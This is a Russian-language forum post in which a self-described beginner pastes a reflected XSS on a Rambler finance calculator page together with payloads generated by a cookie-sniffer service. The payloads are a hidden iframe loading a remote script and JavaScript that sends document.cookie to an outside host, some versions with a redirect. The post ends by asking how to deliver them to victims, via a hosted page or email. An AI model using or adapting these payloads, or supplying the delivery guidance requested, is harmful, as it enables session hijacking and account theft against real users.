25isb2010
Сообщений: 2
Оценки: 0
Присоединился: 2011-11-10 10:30:20.003333
|
Значит такая проблема… Решил я узнать получше что такое XSS, прочитал статьи, заинтересовало решил попробовать, взял уже найденную пассивную XSS на рамблере (сам скриптами не смог найти[:(] или руки корявые или голова не варит, а может быть не там ищу! [&:] ). Ну вообщем зарегистрировался на сайте https://hacker-pro.net/sniffer в сниффере. Вставил туда взятую на форуме XSS и вставил в окошечко где пассивная XSS (вот она…: http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest=%22%22<%27%3E) поставил url на редирект: http://vkbugs.ru всё это сохранил. Вот мне выдало дальше… url для пассивной XSS: http://httpz.ru/5f3zitfqjuq Код размещения xss фрейма на странице: <iframe src='http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest=%22%22<%27%3E%3CSCRIPT type=text/javascript src=http://httpz.ru/5f3zitfqjugo.js></SCRIPT>"' width='0' height='0' style='display:none'></iframe> Код для пассивной XSS атаки: %3CSCRIPT type=text/javascript src=http://httpz.ru/5f3zitfqjugo.js></SCRIPT>" html код: <img src="http://httpz.ru/n5f3zitfqju.gif"> bb код: JavaScript код: <script> img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie; </script> JavaScript код с редиректом: <script> img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie; // редирект через 3 сек. var URL = "http://vkbugs.ru" var speed = 3000; function reload() { document.location = URL } setTimeout("reload()", speed); </script> JavaScript код для адресной строки: javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;</script>') JavaScript код для адресной строки c редиректом: javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;var URL = "http://vkbugs.ru";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);</script>') Подскажите пожалуйста что мне делать дальше с этим со всем!? Что из этого выбрать? И для каких целей нужны все эти разные коды? Куда вставлять? И как пользоваться? И как вообще применить? Если кому не сложно ответить, подскажите мне пожалуйста, опишите подробно как с этим со всем управляться чтобы всё получилось. Нужно ли мне создавать сайт на бесплатном хостинге? Или по почте можно это как нибудь отправить?
|